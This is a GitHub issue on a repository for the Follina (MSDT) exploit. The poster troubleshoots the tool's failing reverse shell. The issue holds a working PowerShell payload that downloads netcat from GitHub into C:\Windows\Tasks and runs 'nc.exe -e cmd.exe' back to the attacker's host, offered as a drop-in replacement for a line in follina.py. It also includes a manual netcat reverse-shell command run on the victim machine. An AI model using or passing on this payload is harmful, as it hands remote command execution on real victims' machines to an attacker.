msdt-follina icon indicating copy to clipboard operation
msdt-follina copied to clipboard

Get a reverse shell not working

Open Skunky824 opened this issue 2 years ago • 0 comments

According to Readme.md you should be able to get a reverse shell just by running python3 follina.py -r 9001, this didn't work for me and i had to manually download netcat on the victim machine from "https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe" then run nc.exe -e cmd.exe $HOST_IP to successfully get a reverse shell in the attacker box.

Invoke-WebRequest complains about creating an SSL connection.

This can be fixed by changing line 113 in follina.py with: command = f"""[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""

Skunky824 avatar Jun 26 '22 00:06 Skunky824